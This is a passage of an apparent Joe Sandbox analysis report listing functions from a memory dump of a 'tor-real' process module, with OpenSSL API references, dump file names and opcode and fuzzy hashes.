                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: 5afb7075198720376717fa6adb54b928a30385d35ebcfd764377c7f717391907
                                                                            • Instruction ID: 2caf9c002315e2400494f998f461625a2086c76de411d38269bc42745a2d423b
                                                                            • Opcode Fuzzy Hash: 5afb7075198720376717fa6adb54b928a30385d35ebcfd764377c7f717391907
                                                                            • Instruction Fuzzy Hash: 41E08CF18043048FCB109F24D48538AB7E0BF45309F45896CED882F302C335B5158F91
                                                                            Function 6C0BE710 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: da0cf99b721cccf9b0553fed92a2f562c712b781469e7275d4518ac367a17dbb
                                                                            • Instruction ID: b2594750913c3cb49d824c7b4672ead5f72766dc1e094dd60a494e8aece2ed05
                                                                            • Opcode Fuzzy Hash: da0cf99b721cccf9b0553fed92a2f562c712b781469e7275d4518ac367a17dbb
                                                                            • Instruction Fuzzy Hash: 75E0B6B4509340CFD710EF68D4CDB69BBE0AF49304F5589ADE8985F362D779A8448F81
                                                                            Function 6C0BE7F7 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: 77b6d7ab50f3f7554595b83c985d0487d07491389b5062a029794c5fb59f5fa6
                                                                            • Instruction ID: 7c267ad91ed9c6e2b16517b04df312961598b110fb22307b60e5f4e9227775ba
                                                                            • Opcode Fuzzy Hash: 77b6d7ab50f3f7554595b83c985d0487d07491389b5062a029794c5fb59f5fa6
                                                                            • Instruction Fuzzy Hash: E2E0B6B15047008FDB10DF54D8C539A7BE0AB4530AF95496CED886F346D77AA4458F91
                                                                            Function 6C0A4D30 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_get_ex_new_index.LIBCRYPTO-1_1 ref: 6C0A4D62
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_get_ex_new_index
                                                                            • String ID:
                                                                            • API String ID: 3987194240-0
                                                                            • Opcode ID: 1769fcbc0769c25374d2c7ab342fef7ec0c178828c8ad79b152617869e21b52b
                                                                            • Instruction ID: 7fc82f8a524b988d79f4cc8bbb8094b7b2d2afe79d7e582ad1089ebed6359f63
                                                                            • Opcode Fuzzy Hash: 1769fcbc0769c25374d2c7ab342fef7ec0c178828c8ad79b152617869e21b52b
                                                                            • Instruction Fuzzy Hash: 5DE0B6B45443019FD700DF55E16530B7AF0FB89305F408A0CE9A88B240D7BA8288DFC6
                                                                            Function 6C0ACBE7 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACBFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_run_once
                                                                            • String ID:
                                                                            • API String ID: 1403826838-0
                                                                            • Opcode ID: f455dcf7d55761a3e46da5265b996d0471a91b74652187ed77fc1e60a2a65923
                                                                            • Instruction ID: 76e47ae26f9bb29fbe116e8a6878bf90e201c4ed79790ecbb0baa9c47fc1f201
                                                                            • Opcode Fuzzy Hash: f455dcf7d55761a3e46da5265b996d0471a91b74652187ed77fc1e60a2a65923
                                                                            • Instruction Fuzzy Hash: 86D052B275520A8BC6106AF4890238A72E4AB42284F0A040D89989BA12E733A4169E82
                                                                            Function 6C0B24D7 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: 043abb45f6db7e1395d4506fce68526c7b4668a500a7e333ba3d53bc6ab2874e
                                                                            • Instruction ID: 96244bb208b83b844cc8534a21cf7f5379fef1e816af038ddc61c55a31e4f681
                                                                            • Opcode Fuzzy Hash: 043abb45f6db7e1395d4506fce68526c7b4668a500a7e333ba3d53bc6ab2874e
                                                                            • Instruction Fuzzy Hash: 2BE017B2504B00CEEB408FA4E88579BBBE0EF4930AF24487CDD4C9F246D33498858F45
                                                                            Function 6C0ACBB4 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,6C0BB712), ref: 6C0ACBC7
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_run_once
                                                                            • String ID:
                                                                            • API String ID: 1403826838-0
                                                                            • Opcode ID: f4dae514162477a034a4692d6b3be0927b1b0a337a5467d4486ec81c730450a7
                                                                            • Instruction ID: a6b54ec94af13fa572ef2cc6ea8f9d1a1a518ae009c5ffc4f4ea9bb2afa08326
                                                                            • Opcode Fuzzy Hash: f4dae514162477a034a4692d6b3be0927b1b0a337a5467d4486ec81c730450a7
                                                                            • Instruction Fuzzy Hash: 66D0A7B1B553054BC7106FE0880134B33E0AB82344F5A851DCD544BA12E733D4138EC3
                                                                            Function 6C0AC6A3 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: ca9407dcad635cbf2946c2414bd6789a418e649512e4fc1ae982469368015b9c
                                                                            • Instruction ID: 6db53039636425107037a94090ffb13e5430f7c08fb233f517db579828aac449
                                                                            • Opcode Fuzzy Hash: ca9407dcad635cbf2946c2414bd6789a418e649512e4fc1ae982469368015b9c
                                                                            • Instruction Fuzzy Hash: 59D017B1408B008FD7109F14E08434BBBE0AF00309F11CC0CD49A5BB50C375E8858B81
                                                                            Function 6C0BE7B1 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: f2cb0f5643aff8e3af5f99d1a3d13eb6b5288b9003ed2dd2ef09620f21afe8cb
                                                                            • Instruction ID: 3963fe02c051f0b4b793d48b3e044a71674c01afa100d333efeeca827b90870a
                                                                            • Opcode Fuzzy Hash: f2cb0f5643aff8e3af5f99d1a3d13eb6b5288b9003ed2dd2ef09620f21afe8cb
                                                                            • Instruction Fuzzy Hash: 21E017B5500300CFD7618F54D0897997BE0AF04704F0688ACE94C5F362D779B5848F42
                                                                            Function 6C0AC050 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0AC06A
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zalloc
                                                                            • String ID:
                                                                            • API String ID: 1208671065-0
                                                                            • Opcode ID: f62b19f824d4eb6a5096a7de3b0060d6c3cc56f046f008b8ad22d28115e88ba4
                                                                            • Instruction ID: bc2639e9f8acfdf21c436ee47e50615e012938e796542fa8b33d35183d754300
                                                                            • Opcode Fuzzy Hash: f62b19f824d4eb6a5096a7de3b0060d6c3cc56f046f008b8ad22d28115e88ba4
                                                                            • Instruction Fuzzy Hash: 3AC04CB54087459AD6117F08C54631A79E06B80655FD4888C988807661EB7841589B67
                                                                            Function 6C0AC860 Relevance: 99.1, APIs: 66, Instructions: 117COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_des_cbc.LIBCRYPTO-1_1 ref: 6C0AC863
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC86B
                                                                            • EVP_des_ede3_cbc.LIBCRYPTO-1_1 ref: 6C0AC870
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC878
                                                                            • EVP_idea_cbc.LIBCRYPTO-1_1 ref: 6C0AC87D
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC885
                                                                            • EVP_rc4.LIBCRYPTO-1_1 ref: 6C0AC88A
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC892
                                                                            • EVP_rc4_hmac_md5.LIBCRYPTO-1_1 ref: 6C0AC897
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC89F
                                                                            • EVP_rc2_cbc.LIBCRYPTO-1_1 ref: 6C0AC8A4
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8AC
                                                                            • EVP_rc2_40_cbc.LIBCRYPTO-1_1 ref: 6C0AC8B1
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8B9
                                                                            • EVP_aes_128_cbc.LIBCRYPTO-1_1 ref: 6C0AC8BE
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8C6
                                                                            • EVP_aes_192_cbc.LIBCRYPTO-1_1 ref: 6C0AC8CB
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8D3
                                                                            • EVP_aes_256_cbc.LIBCRYPTO-1_1 ref: 6C0AC8D8
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8E0
                                                                            • EVP_aes_128_gcm.LIBCRYPTO-1_1 ref: 6C0AC8E5
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8ED
                                                                            • EVP_aes_256_gcm.LIBCRYPTO-1_1 ref: 6C0AC8F2
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC8FA
                                                                            • EVP_aes_128_ccm.LIBCRYPTO-1_1 ref: 6C0AC8FF
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC907
                                                                            • EVP_aes_256_ccm.LIBCRYPTO-1_1 ref: 6C0AC90C
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC914
                                                                            • EVP_aes_128_cbc_hmac_sha1.LIBCRYPTO-1_1 ref: 6C0AC919
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC921
                                                                            • EVP_aes_256_cbc_hmac_sha1.LIBCRYPTO-1_1 ref: 6C0AC926
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC92E
                                                                            • EVP_aes_128_cbc_hmac_sha256.LIBCRYPTO-1_1 ref: 6C0AC933
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC93B
                                                                            • EVP_aes_256_cbc_hmac_sha256.LIBCRYPTO-1_1 ref: 6C0AC940
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC948
                                                                            • EVP_aria_128_gcm.LIBCRYPTO-1_1 ref: 6C0AC94D
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC955
                                                                            • EVP_aria_256_gcm.LIBCRYPTO-1_1 ref: 6C0AC95A
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC962
                                                                            • EVP_camellia_128_cbc.LIBCRYPTO-1_1 ref: 6C0AC967
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC96F
                                                                            • EVP_camellia_256_cbc.LIBCRYPTO-1_1 ref: 6C0AC974
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC97C
                                                                            • EVP_chacha20_poly1305.LIBCRYPTO-1_1 ref: 6C0AC981
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC989
                                                                            • EVP_seed_cbc.LIBCRYPTO-1_1 ref: 6C0AC98E
                                                                            • EVP_add_cipher.LIBCRYPTO-1_1 ref: 6C0AC996
                                                                            • EVP_md5.LIBCRYPTO-1_1 ref: 6C0AC99B
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0AC9A3
                                                                            • OBJ_NAME_add.LIBCRYPTO-1_1 ref: 6C0AC9BF
                                                                            • EVP_md5_sha1.LIBCRYPTO-1_1 ref: 6C0AC9C4
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0AC9CC
                                                                            • EVP_sha1.LIBCRYPTO-1_1 ref: 6C0AC9D1
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0AC9D9
                                                                            • OBJ_NAME_add.LIBCRYPTO-1_1 ref: 6C0AC9F5
                                                                            • OBJ_NAME_add.LIBCRYPTO-1_1 ref: 6C0ACA11
                                                                            • EVP_sha224.LIBCRYPTO-1_1 ref: 6C0ACA16
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0ACA1E
                                                                            • EVP_sha256.LIBCRYPTO-1_1 ref: 6C0ACA23
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0ACA2B
                                                                            • EVP_sha384.LIBCRYPTO-1_1 ref: 6C0ACA30
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0ACA38
                                                                            • EVP_sha512.LIBCRYPTO-1_1 ref: 6C0ACA3D
                                                                            • EVP_add_digest.LIBCRYPTO-1_1 ref: 6C0ACA45
                                                                              • Part of subcall function 6C0AA230: CRYPTO_THREAD_run_once.LIBCRYPTO-1_1 ref: 6C0AA242
                                                                              • Part of subcall function 6C0A8830: OBJ_nid2sn.LIBCRYPTO-1_1 ref: 6C0A8879
                                                                              • Part of subcall function 6C0A8830: EVP_get_cipherbyname.LIBCRYPTO-1_1 ref: 6C0A8881
                                                                              • Part of subcall function 6C0A8830: OBJ_nid2sn.LIBCRYPTO-1_1 ref: 6C0A88E9
                                                                              • Part of subcall function 6C0A8830: EVP_get_digestbyname.LIBCRYPTO-1_1 ref: 6C0A88F1
                                                                              • Part of subcall function 6C0A8830: EVP_PKEY_asn1_find_str.LIBCRYPTO-1_1 ref: 6C0A896B
                                                                              • Part of subcall function 6C0A8830: EVP_PKEY_asn1_get0_info.LIBCRYPTO-1_1 ref: 6C0A899F
                                                                              • Part of subcall function 6C0A8830: ENGINE_finish.LIBCRYPTO-1_1 ref: 6C0A89B3
                                                                              • Part of subcall function 6C0A8830: EVP_PKEY_asn1_find_str.LIBCRYPTO-1_1 ref: 6C0A89F6
                                                                              • Part of subcall function 6C0A8830: EVP_PKEY_asn1_get0_info.LIBCRYPTO-1_1 ref: 6C0A8A2A
                                                                              • Part of subcall function 6C0A8830: ENGINE_finish.LIBCRYPTO-1_1 ref: 6C0A8A3E
                                                                            • OPENSSL_atexit.LIBCRYPTO-1_1 ref: 6C0ACA5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: P_add_cipher$P_add_digest$E_add$E_finishJ_nid2snY_asn1_find_strY_asn1_get0_info$D_run_onceL_atexitP_aes_128_cbcP_aes_128_cbc_hmac_sha1P_aes_128_cbc_hmac_sha256P_aes_128_ccmP_aes_128_gcmP_aes_192_cbcP_aes_256_cbcP_aes_256_cbc_hmac_sha1P_aes_256_cbc_hmac_sha256P_aes_256_ccmP_aes_256_gcmP_aria_128_gcmP_aria_256_gcmP_camellia_128_cbcP_camellia_256_cbcP_chacha20_poly1305P_des_cbcP_des_ede3_cbcP_get_cipherbynameP_get_digestbynameP_idea_cbcP_md5P_md5_sha1P_rc2_40_cbcP_rc2_cbcP_rc4P_rc4_hmac_md5P_seed_cbcP_sha1P_sha224P_sha256P_sha384P_sha512
                                                                            • String ID:
                                                                            • API String ID: 120949582-0
                                                                            • Opcode ID: 8f7ea94addfd550e8e4e054fd34fb3adcb4131ac4892da67b07d1285b5594e94
                                                                            • Instruction ID: 5b9cf30fa931aa4087360f0574e212e94647ed98a16e1e715a55ef8e0b175438
                                                                            • Opcode Fuzzy Hash: 8f7ea94addfd550e8e4e054fd34fb3adcb4131ac4892da67b07d1285b5594e94
                                                                            • Instruction Fuzzy Hash: 6041B27498D6088ECE107FF480453AE7EF0AF4D64EF72481C94825BB51EB79A0D88B63
                                                                            Function 6C0A0540 Relevance: 73.9, APIs: 39, Strings: 3, Instructions: 420COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
